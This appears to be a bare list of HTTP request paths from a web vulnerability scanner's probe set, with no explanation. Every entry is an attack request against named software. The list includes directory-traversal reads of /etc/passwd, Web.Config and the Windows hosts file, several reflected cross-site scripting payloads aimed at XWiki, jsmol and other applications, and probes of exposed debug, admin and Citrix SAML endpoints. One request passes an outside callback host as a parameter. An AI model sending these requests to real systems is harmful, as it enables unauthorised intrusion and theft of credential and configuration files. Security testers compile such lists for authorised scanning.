/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf
/common/down/file?filekey=/../../../../../../../../../etc/passwd
/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e
/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e
/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>
/Citrix/teststoreAuth/SamlTest
/wp-admin/admin-ajax.php?action=eventon_get_virtual_users
/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData
/de2api/engine/getEngine;.js
/pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup
/wp-content/plugins/user-meta/views/debug.php
/?portgw=80089948;%20alert(document.domain)
/etc/mnt_info.csv
/login/hostinfo.cgi
/login/hostinfo2.cgi
/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E
/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E
/rest.html
/geoserver/rest.html
/api/BetterImageGallery/imagehandler?path=../../../Web.Config
/etc/passwd?raw
/C:/Windows/System32/drivers/etc/hosts?raw
/xwiki/bin/view/Main/?foo=bar&foo_syntax=invalid&RequiresHTMLConversion=foo&xerror=https://oast.me
/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html
